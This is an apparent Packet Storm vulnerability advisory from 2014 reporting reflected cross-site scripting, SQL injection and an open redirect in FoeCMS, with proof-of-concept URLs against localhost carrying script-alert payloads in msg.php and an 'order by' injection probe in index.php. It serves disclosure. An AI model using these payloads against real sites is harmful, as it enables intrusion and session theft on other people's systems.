FoeCMS XSS / SQL Injection / Open Redirect

2014-07-04T00:00:00
ID PACKETSTORM:127358
Type packetstorm
Reporter Govind Singh
Modified 2014-07-04T00:00:00

Description

                                        
                                            `##################################################################################################  
#  
#Exploit Title : FoeCMS multiple vulnerability   
#Author : Govind Singh aka NullPort  
#Vendor : http://foecms.com/  
#Download Link : https://github.com/themarioga/FoeCMS/archive/master.zip  
#Date : 05/07/2014  
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )  
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi  
#Greez to : All IHT Members   
##################################################################################################  
  
Reflected Cross-Site Scripting ::  
---------------------------  
Reflected Cross-Site Scripting effecting "msg.php" with variables "e" & "r"  
PoC : 1 with variable "e"  
  
http://localhost/FoeCMS/msg.php?e=[XSS]  
  
http://localhost/FoeCMS/msg.php?e=%3Cscript%3Ealert%28%27hello%27%29;%3C/script%3Ecms_delinstall&r=index.php&nr=1  
  
payload : <script>alert('hello');</script>  
  
PoC : 2 with variable "r"  
http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=[XSS]  
  
http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=%27%22%3E%3Cscript%3Ealert%28%27hello%27%29;%3C/script%3E  
  
payload : '"><script>alert('hello');</script>  
----------------------------------------------------------------------------------------------------  
Cookies Based Sql injection ::  
-------------------------  
http://localhost/FoeCMS/index.php?i=[Sqli]  
  
PoC :   
http://localhost/FoeCMS/index.php?i=-1' order by 3--+  
----------------------------------------------------------------------------------------------------  
open Redirect ::  
Open Redirect effecting "msg.php" with variable "r" when we set value of "r=https://scontent-a-ams.xx.fbcdn.net/hphotos-xaf1/t1.0-9/q71/s720x720/419153_136544006541776_1226726278_n.jpg"   
-------------------------  
PoC : Open Redirect with variable "r"  
  
http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=[Redirect]  
  
http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=https://scontent-a-ams.xx.fbcdn.net/hphotos-xaf1/t1.0-9/q71/s720x720/419153_136544006541776_1226726278_n.jpg  
`